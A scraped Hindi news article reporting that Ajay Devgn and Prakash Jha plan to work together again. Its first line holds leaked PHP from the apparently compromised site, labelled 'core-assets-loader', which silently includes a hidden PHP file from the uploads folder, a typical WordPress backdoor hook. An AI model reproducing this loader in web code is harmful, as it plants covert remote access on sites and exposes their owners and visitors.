add_action('wp_head', function(){echo '';}, 1); /* core-assets-loader */ @include_once('/home/sochindi/public_html/wp-content/uploads/.wp-cache-cd8672/.object-cache.php'); 5 साल बाद ‘अपहरण’ और ‘सत्याग्रह’ के बाद अजय देवगन और प्रकाश झा फिर करेंगे धमाल! – SOCH INDIA
Menu

मनोरंजन
5 साल बाद ‘अपहरण’ और ‘सत्याग्रह’ के बाद अजय देवगन और प्रकाश झा फिर करेंगे धमाल!

nobanner

नई दिल्ली. बॉलीवुड में हमेशा से डायरेक्टर, प्रोड्यूसर और अभिनेताओं की जोड़ियों कई कीर्तिमान रचे हैं. ऐसी एक जोड़ी रही है बेहतरीन एक्टर अजय देवगन और अपने डिफरेंट कॉन्सेप्ट पर फिल्में बनाने वाले निमार्ता निर्देशक प्रकाश झा की. इस जोड़ी ने बॉलीवुड के कर्ददानों का हर बार दिल जीता है. लेकिन अचानक कुछ ऐसा हुआ कि दोनों ने एक दूसरे का साथ छोड़ दिया. अंतिम बार यह जोड़ी ने सत्याग्रह (2013) में नजर आई थी. लेकिन कमर्शियल सिनेमा में रियलिस्टिक सिनेमा का तड़का पसंद करने वाले दर्शकों के लिए एक खुशखबरी है. अजय देवगन और प्रकाश झा एक बार फिर साथ काम करने के लिए तैयार हैं.

हमारी सहयोगी वेबसाइट डीएनए की खबर के मुताबिक फिल्म उद्योग के अंदरूनी सूत्र ने बताया है कि यह दोनों ही एक बार फिर टीम की तरह काम करने के लिए तैयार हैं. इस संबंध में एक यथार्थवादी विषय पर फिल्म के संबंध में प्रकाश झा ने अजय देवगन से संपर्क किया है. फिल्म की थीम और स्क्रिप्ट पर दोनों ने बैठकर चर्चा भी कर ली है. खबर यह भी है कि अजय देवगन को यह कॉन्सेप्ट कुछ ज्यादा ही पसंद आया है. जल्द ही इस फिल्म की कहानी और स्क्रिप्ट को पूरी तरह डेवलप किए जाने के बाद अधिकारिक घोषणा होने वाली है. लेकिन इसे लेकर अभी कोई तारीख तय नहीं है.

गौरतलब है कि प्रकाश झा और अजय देवगन ने 1999 से लेकर 2013 तक 5 फिल्मों में एक साथ काम किया है. यह पांचों फिल्में बॉक्स ऑफिस पर शानदार प्रदर्शन वाली रही हैं. ये फिल्में हैं, दिल क्या करे (1999), गंगाजल (2003), अपहरण (2005), राजनीती (2010) और सत्याग्रह (2013).